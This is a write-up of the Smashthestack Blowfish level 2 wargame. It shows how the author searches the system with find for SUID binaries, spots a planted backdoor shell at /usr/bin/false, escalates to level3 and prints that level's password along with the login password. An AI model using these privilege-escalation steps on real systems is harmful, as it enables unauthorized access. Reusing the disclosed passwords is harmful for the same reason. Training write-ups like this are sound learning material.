Smashthestack Blowfish Level 02

To enter this level we have to ssh with password welcome:

$ssh level2@blowfish.smashthestack.org -p 2222

1. Thou shalt NOT root or otherwise harm the box.
     2. Thou shalt NOT access any other network from this box.
     3. Thou shalt NOT use any other directory besides /tmp or /code for code. 
     4. Thou shalt give the root pass to l3thal if you manage to change it.

     Passwords are in /pass.
     There is a README in each users home directory.
     /tmp && /var/tmp will be flushed daily by cron.
     Use /code plz for umm, code ;D
     IF YOU LEAVE FILES IN /levels/tmp U SUCK ..plz remove them kthnx! ;D
     The password for the last level will get you into
     Tux, the more advanced wargame. Join #blowfish on 
     irc.smashthestack.org with any questions. 

     Admins - l3thal && cr 

     Forum: http://smashthestack.org/viewforum.php?id=10

Last login: Thu Jan 28 21:41:34 2010 from 190.191.160.196

 There is a backdoor to the next level hidden somewhere on this system,
 find it, and get the pass for level3 from /pass/level3

- http://smashthestack.org/viewtopic.php?id=436

 hint: `man find`

So we need to find a backdoor, this usually means that a file that we can execute but can scale
privileges. To do that a file must have the suid flag on. if we look in the man for find we'll see that
to search for files that have the suid flag we have to filter by the mode. To search for the suid and
guid flags we have to search for the permission 4000. So:

level2@blowfish:/var/tmp/public_html$ find / -executable -perm -4000
/bin/su
/bin/ping6
/bin/mount
/bin/umount
/usr/bin/false
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown

Among those files there is one that should not have the suid flag: that one is /usr/bin/false
Let's execute it:

Stand-alone shell (version 3.7)
> id
uid=1004(level2) gid=1004(level2) euid=1005(level3) groups=1004(level2)

It's a shell and it runs with level3 permissions, we just have to read the pass:

> cat /pass/level3
l3thal_Rul3Z!

There we have the password: l3thal_Rul3Z!, see ya on the next level tutorial here.

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-ShareAlike 3.0 License